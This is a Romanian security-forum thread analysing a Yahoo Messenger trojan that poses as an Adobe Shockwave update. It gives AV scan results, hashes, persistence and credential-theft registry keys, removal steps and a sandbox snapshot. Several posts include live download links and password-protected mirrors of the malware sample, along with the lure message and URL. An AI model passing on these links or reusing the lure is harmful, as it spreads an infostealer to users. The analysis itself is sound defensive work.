Jump to content
begood

Inca un virus yahoo

By begood, in Stiri securitate

Recommended Posts

begood Newbie

begood

Posted
Posted

2hrojk4.jpg

Se da drept un update de Adobe Shockwave player.

Cloud Antivirus l-a detectat imediat.

analiza virustotal :

http://www.virustotal.com/analisis/c085bc9738dca68a0242683ac0a825440af09f4a08fe74a441e0f8efefb313c5-1265013900

 File setup.exe received on 2010.02.01 08:45:00 (UTC)
Current status: finished
Result: 23/40 (57.50%)
Compact Compact
Print results Print results
Antivirus 	Version 	Last Update 	Result
a-squared 	4.5.0.50 	2010.02.01 	Dialer!IK
AhnLab-V3 	5.0.0.2 	2010.01.31 	Win-Trojan/Mdshell.3016192
AntiVir 	7.9.1.154 	2010.01.31 	DIAL/Generic
Antiy-AVL 	2.0.3.7 	2010.02.01 	-
Authentium 	5.2.0.5 	2010.01.31 	W32/Trojan-Gypikon-based.DE!Maximus
Avast 	4.8.1351.0 	2010.01.31 	Win32:Malware-gen
AVG 	9.0.0.730 	2010.01.31 	-
BitDefender 	7.2 	2010.02.01 	Win32.Worm.IM.J
CAT-QuickHeal 	10.00 	2010.02.01 	-
ClamAV 	0.96.0.0-git 	2010.02.01 	-
Comodo 	3780 	2010.02.01 	Heur.Suspicious
DrWeb 	5.0.1.12222 	2010.02.01 	-
eSafe 	7.0.17.0 	2010.01.31 	Win32.DIALGeneric
eTrust-Vet 	35.2.7274 	2010.02.01 	Win32/Tnega.ADE
F-Prot 	4.5.1.85 	2010.01.31 	W32/Trojan-Gypikon-based.DE!Maximus
F-Secure 	9.0.15370.0 	2010.01.31 	Win32.Worm.IM.J
Fortinet 	4.0.14.0 	2010.02.01 	W32/Delf.TUP!tr
GData 	19 	2010.02.01 	Win32.Worm.IM.J
Ikarus 	T3.1.1.80.0 	2010.02.01 	Dialer
Jiangmin 	13.0.900 	2010.01.28 	-
K7AntiVirus 	7.10.960 	2010.01.29 	-
Kaspersky 	7.0.0.125 	2010.02.01 	Trojan.Win32.Agent2.cnkw
McAfee 	5878 	2010.01.31 	Generic.dx!mgr
McAfee+Artemis 	5878 	2010.01.31 	Artemis!FA8305E3E69B
McAfee-GW-Edition 	6.8.5 	2010.02.01 	Dialer.Generic
Microsoft 	1.5406 	2010.02.01 	-
NOD32 	4823 	2010.02.01 	-
Norman 	6.04.03 	2010.01.31 	-
nProtect 	2009.1.8.0 	2010.02.01 	-
Panda 	10.0.2.2 	2010.01.31 	Trj/CI.A
PCTools 	7.0.3.5 	2010.02.01 	Trojan-PSW.Bancos
Rising 	22.33.00.04 	2010.02.01 	-
Sophos 	4.50.0 	2010.02.01 	Mal/Generic-A
Sunbelt 	3.2.1858.2 	2010.01.31 	Trojan.Win32.Generic!BT
Symantec 	20091.2.0.41 	2010.02.01 	Infostealer.Bancos
TheHacker 	6.5.1.0.175 	2010.02.01 	-
TrendMicro 	9.120.0.1004 	2010.02.01 	-
VBA32 	3.12.12.1 	2010.01.29 	-
ViRobot 	2010.2.1.2165 	2010.02.01 	-
VirusBuster 	5.0.21.0 	2010.01.31 	-
Additional information
File size: 3016192 bytes
MD5   : fa8305e3e69b27a7b95dcf2cec0fcb9f
SHA1  : a4552f2899871702f83969ba01ce50228ab8c6fd
SHA256: c085bc9738dca68a0242683ac0a825440af09f4a08fe74a441e0f8efefb313c5

pagina de download originala :

http://dl.fisier.ro/files/dh5kgfingf335je/setup.exe.html

mirror : 

http://www.2shared.com/file/11045927/5afa1303/setup_virus.html

pass :

begood@rstcenter.com

pagina de pe care o primesti prin yahoo IM:

http://roamateursxx.freehostking.com/profile.php?user=[ID-ul tau]

mirror la pagina asta : 

http://www.2shared.com/file/11045982/d07f0f06/virus_downloadpage.html

aceeasi parola.

mesajul pe care l-am primit prin Y! im :

tu ti-ai facut profilu asta? http://roamateursxx.freehostking.com/profile.php?user=me

LE: Imi place cum au gandit atacatorii.

Trimit link cu un profil porno care nu este afisat corect la victima. Din cauza ca o afecteaza direct (id-ul victimei fiind in link), trebuie sa-si instaleze update-ul acela pentru a-si vedea propriu profil. Voila, nou trojan instalat.

Nytro Mentor

Nytro

Posted
Posted (edited)

Thanks.

Virusul se copiaza in Windows/system32/cgsb.exe si se pune la startup in ( HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ). Iconita e de Internet Explorer.

Ca sa scapati de el stergeti acel fisier. Ciudat, ls startup, locatia de executare apare cu o virgula inainte.

La rulare arata un ProgressBar urat, si la sfarsit da eroare: "Unable to Register ActiveX...".

Cred ca foloseste OpenSSL, copiaza in system32 libeay32.dll si ssleay32.dll. Nu sunt sigur. Cred ca acel "setup" care probabil e un binder scris in Delphi, contine 5 fisiere. Mai copiaza si YahooAuth2.dll ( Bricksoft nu Yahoo! la Company Name, ciudat ). Si cred ca ar mai fi MSIMTF.DLL ( Microsoft ).

EDIT: La a doua rulare, s-a copiat sub numele de xdbyqdn.exe. Asta inseamna ca numele e aleator, sau poate avea un anumit numar de nume posibile.

CA SA SCAPATI DE EL: Intrati in Windows\system32 si stergeti executabilul/executabilele cu iconita de INTERNET EXPLORER ( 6 ).

Revin cu mai multe detalii.

Edited by Nytro
  • Upvote 1
Flubber Newbie

Flubber

Posted
Posted

"citind de lup"

x (2/1/2010 2:30:58 PM): Georgiana: tu ti-ai facut profilu asta? hxxp://roamateursxx.freehostking.com/profile.php?user=id lui

x: ce ai zis ca ma pacalesti

x: si instalez ala nu ?

x: )

Hide Recent Messages (F3)

You currently appear offline to Georgiana.

x: si 2 vezi ca nu e frumos ce faci

x: dupa te miri dc te bate lumea )

x (2/1/2010 2:31:06 PM): mai are rost sa`i zic si ca are creieru mic ?

Flubber (2/1/2010 2:31:11 PM): http://rstcenter.com/forum/19709-inca-un-virus-yahoo.rst

Flubber (2/1/2010 2:31:13 PM): tocmai ce citeam

begood Newbie

begood

Posted
  • Author
Posted

Google Safe Browsing: Report a Malware Page

bagati mare aici.

asta : http://roamateursxx.freehostking.com/

LE: analiza anubis:

http://anubis.iseclab.org/?action=result&task_id=19351d648dd9e1984d109350b9a0ca423

Nytro, ai omis ca face si al patrulea fisier :

C:\WINDOWS\system32\YahooAuth2.dll

C:\WINDOWS\system32\libeay32.dll

C:\WINDOWS\system32\ssleay32.dll

C:\WINDOWS\system32\tqsbsf.exe

http://www.threatexpert.com/report.aspx?md5=fa8305e3e69b27a7b95dcf2cec0fcb9f

deci are si keylogger si stealer :)

grija mare pt cititori !

Nytro Mentor

Nytro

Posted
Posted (edited)

Citeste:

HKCU\Software\Yahoo\pager\Yahoo! User ID

HKCU\Software\Yahoo\pager\ETS

HKCU\Software\Yahoo\pager\Save Password

Fura parola de messenger. Copiaza ID-ul si parola in:

HKLM\SOFTWARE\first\USER

HKLM\SOFTWARE\first\PAROLA

E prost scris, citeste Yahoo! User ID de ii sar capacele... Citeste la el pana e completat. Datele le citeste ca un keylogger, in functie de cum sunt apasate, probabil verifica fereastra activa.

Sa vad ce mai pot afla...

Edited by Nytro
tdxev Newbie

tdxev

Posted
Posted

Probabil alta versiune.. se copiaza sub numele("efoqj.exe")

Am injurat o jumatate de zi la una acum 4 zile cand l-am primit :)) am crezut ca este trojan,

dupa aceea am vazut ca a mai trimis iar acelasi mesaj si mi-am dat seama ca nu are de a face...

link-ul primit... prima data a doua zi nu mai era bun,

001Webs.com Free Hosting | 404, Page Doesn't Exist!

link-ul catre fisierul executabil... inca este bun (nu am avut chef sa raportez pagina pe lx.ro daca vreti...)

http://profilexx.haos.ro/update.exe

Virus Total

Virustotal. MD5: 16c71403492c440996722d1d0af8f25a Infostealer.Bancos Dialer.Generic Worm.Agent.AJ

Anubius

Anubis: Analyzing Unknown Binaries

System Snapshots dupa rularea update.exe:


Dir	Added	C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\PresentationCore
Dir	Added	C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\PresentationCore\dbfa432eec6dd6c069fc11ce09a967e6
File	Added	C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\PresentationCore\dbfa432eec6dd6c069fc11ce09a967e6\PresentationCore.ni.dll
Dir	Added	C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAP2.tmp
File	Added	C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\index5f.dat
File	Added	C:\WINDOWS\system32\YahooAuth2.dll
File	Added	C:\WINDOWS\system32\efoqj.exe
File	Added	C:\WINDOWS\system32\libeay32.dll
File	Added	C:\WINDOWS\system32\ssleay32.dll
File	Changed	C:\Documents and Settings\LocalService\Cookies\index.dat	"Modified=1/27/2010 4:04:52 PM"	(old value="Modified=1/27/2010 4:03:04 PM")
File	Changed	C:\Documents and Settings\LocalService\Local Settings\History\History.IE5\index.dat	"Modified=1/27/2010 4:04:52 PM"	(old value="Modified=1/27/2010 4:03:04 PM")
File	Changed	C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat	"Modified=1/27/2010 4:04:52 PM"	(old value="Modified=1/27/2010 4:03:19 PM")
File	Changed	C:\Documents and Settings\LocalService\ntuser.dat.LOG	"Modified=1/27/2010 4:05:05 PM"	(old value="Modified=1/27/2010 4:04:14 PM")
File	Changed	C:\Documents and Settings\NetworkService\ntuser.dat.LOG	"Modified=1/27/2010 4:05:06 PM"	(old value="Modified=1/27/2010 4:04:16 PM")
File	Changed	C:\Program Files\Alwil Software\Avast4\Setup\setup.ini	"Modified=1/27/2010 4:04:53 PM"	(old value="Modified=1/27/2010 4:04:21 PM")
File	Changed	C:\Program Files\Alwil Software\Avast4\Setup\summary.txt	"Size=157 Modified=1/27/2010 4:04:53 PM"	(old value="Size=237 Modified=1/27/2010 3:49:39 PM")
File	Changed	C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ngen_service.log	"Size=442046 Modified=1/27/2010 4:05:53 PM"	(old value="Size=435936 Modified=1/27/2010 4:03:31 PM")
File	Changed	C:\WINDOWS\system32\config\default.LOG	"Modified=1/27/2010 4:05:59 PM"	(old value="Modified=1/27/2010 4:05:07 PM")
File	Changed	C:\WINDOWS\system32\config\system.LOG	"Size=1024 Modified=1/27/2010 4:05:29 PM"	(old value="Size=24576 Modified=1/27/2010 4:05:17 PM")
File	Changed	C:\WINDOWS\WindowsUpdate.log	"Size=937698"	(old value="Size=935860")
Dir	Deleted	C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAP1.tmp
File	Deleted	C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\index5d.dat
Reg Val	Added	HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Nqzvavfgengbe\Qrfxgbc\hcqngr.rkr	BINARY SIZE=16 MD5=831F4D7C8AA6E01F622E4B4300A2E494
Reg Val	Added	HKCU\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer	winspool,Ne00:
Reg Val	Added	HKCU\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer	winspool,Ne00:,15,45
Reg Val	Added	HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Device	Microsoft XPS Document Writer,winspool,Ne00:
Reg Val	Added	HKLM\SOFTWARE\ALWIL Software\Avast\4.0\UpdateReady	1
Reg Val	Added	HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\PresentationFramework, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\1\ImageList	BINARY SIZE=3502 MD5=8088935202887196057F50A0851E9313
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\6\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\2\InvertDependencies\55d78379\49814236\4	
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\DisplayName	System.Deployment,2.0.0.0,,b03f5f7f11d50a3a
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\InvertDependencies
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\LastModTime	BINARY SIZE=8 MD5=A5280890AF1017799761D91B8E6A6EBB
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\SIG	BINARY SIZE=36 MD5=94D1851D7E28900126DB8779282312C1
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\Status	4098
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\DisplayName	Microsoft.VisualC,8.0.0.0,,b03f5f7f11d50a3a
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\InvertDependencies
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\LastModTime	BINARY SIZE=8 MD5=F76C0889743D62F71A63DD879DD0ADB9
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\SIG	BINARY SIZE=36 MD5=189761152A9743F76DB0255A470C012F
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\Status	4098
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\DisplayName	UIAutomationTypes,3.0.0.0,,31bf3856ad364e35
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\LastModTime	BINARY SIZE=8 MD5=AE63CB6E17BE04A15BD69C7ABF9CE64C
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\SIG	BINARY SIZE=36 MD5=034C2155150CE918AC8C879A620302EB
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\Status	4098
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\DisplayName	UIAutomationProvider,3.0.0.0,,31bf3856ad364e35
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\LastModTime	BINARY SIZE=8 MD5=C0865EF9202DC6E0B357A24EC9D3384B
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\SIG	BINARY SIZE=36 MD5=D39E4981EB46562754648F8CB00691DF
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\Status	4098
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\DisplayName	System.Drawing,2.0.0.0,,b03f5f7f11d50a3a
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\LastModTime	BINARY SIZE=8 MD5=D2B3E6E21DF7D6BCAAA67646CF6276B9
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\SIG	BINARY SIZE=36 MD5=0A86BF52F8B4C8838B5457994402CE08
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\Status	4098
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\DisplayName	PresentationCFFRasterizer,3.0.0.0,,31bf3856ad364e35
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\InvertDependencies
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\LastModTime	BINARY SIZE=8 MD5=46DA9424A7E4313575998816161B9346
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\SIG	BINARY SIZE=36 MD5=0224578AFEFC3663122D3FA2BC397084
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\Status	4098
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\8\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\7\InvertDependencies\55d78379\49814236\4	
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d67735\6a8e4b71\5\InvertDependencies
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d67735\6a8e4b71\5\InvertDependencies\55d78379\49814236\4	
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\ConfigMask	4361
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\ConfigString	ZAP--0000-0000
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\DisplayName	PresentationCore,3.0.0.0,,31bf3856ad364e35
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\ILDependencies	BINARY SIZE=160 MD5=096A31B6B5C8CFB799B56EC4700361F3
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\MVID	BINARY SIZE=16 MD5=12B7A2D559DB2AE18514B850EBF54743
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\NIDependencies	BINARY SIZE=60 MD5=3EB20EA66E26A96605A6B15592EC6093
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\Status	0
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f\ILUsageMask	BINARY SIZE=2 MD5=B08B7C15585E653ED9D7F4A0A186496F
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f\NIUsageMask	BINARY SIZE=1 MD5=31741635B41D535098241FEA03C1E47F
Reg Key	Added	HKLM\SOFTWARE\last
Reg Val	Added	HKLM\SOFTWARE\last\Parola	
Reg Val	Added	HKLM\SOFTWARE\last\USER	
Reg Key	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\DefaultSpoolDirectory	C:\WINDOWS\System32\spool\PRINTERS
Reg Key	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Action	0
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Attributes	64
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\ChangeID	2664406
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Datatype	RAW
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Default DevMode	BINARY SIZE=1076 MD5=F5025FF677063E1E5B2AA5E432BF1C0D
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Default Priority	1
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Description	
Reg Key	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\driverVersion	1025
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printBinNames	Automatically Select
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printCollate	BINARY SIZE=1 MD5=93B885ADFE0DA089CDF634904FD59F71
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printColor	BINARY SIZE=1 MD5=55A54008AD1BA589AA210D2629C1DF41
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printDuplexSupported	BINARY SIZE=1 MD5=93B885ADFE0DA089CDF634904FD59F71
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printLanguage	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMaxResolutionSupported	600
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMaxXExtent	8636
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMaxYExtent	11176
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMediaReady	Letter
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMediaSupported	Letter
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMinXExtent	900
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMinYExtent	900
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printNumberUp	0
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printOrientationsSupported	PORTRAIT
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printRateUnit	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printStaplingSupported	BINARY SIZE=1 MD5=93B885ADFE0DA089CDF634904FD59F71
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsKeyUpdate	0
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsKeyUpdateForeground	3
Reg Key	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\description	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\driverName	Microsoft XPS Document Writer
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\flags	0
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\location	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\portName	XPSPort:
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printEndTime	0
